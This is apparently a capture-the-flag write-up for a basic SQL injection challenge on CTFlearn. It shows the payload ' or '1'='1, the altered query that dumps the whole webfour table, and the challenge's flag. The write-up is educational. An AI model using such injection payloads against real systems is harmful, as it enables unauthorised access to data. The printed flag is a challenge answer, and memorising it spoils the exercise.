As the name suggests this challenge purpose is to showcase a basic sql injection attack.
It can be seen below that the actual sql code of query is provided together with the real-time resulting query based on the user input on the challenges website.
The first step is to check if the input to the query is sanitized, this can be done by trying to manipulate the query by using special sql characters like the ' ' character.
A basic input to check is
' or '1'='1
Where if the input is not sanitized will result in a query like
# The original query
SELECT * FROM webfour.webfour where name = '$input'
# $input= ' or '1'='1 resulting in
SELECT * FROM webfour.webfour where name = '' or '1'='1'
After trying the described input to the website of the challenge it can be seen that the input is not sanitized and thus gives us the data of whole ‘webfour’ table.
Giving us the flag CTFlearn{th4t_is_why_you_n33d_to_sanitiz3_inputs}